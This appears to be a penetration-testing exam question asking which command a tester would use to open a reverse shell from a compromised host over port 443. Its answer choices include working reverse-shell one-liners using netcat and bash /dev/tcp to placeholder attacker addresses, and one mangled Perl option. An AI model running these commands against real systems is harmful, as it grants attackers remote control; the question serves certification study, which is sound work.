A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell
from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?
A. perl -e ‘use SOCKET’; $i='<SOURCEIP>; $p=’443;
B. ssh superadmin@<DESTINATIONIP> -p 443
C. nc -e /bin/sh <SOURCEIP> 443
D. bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1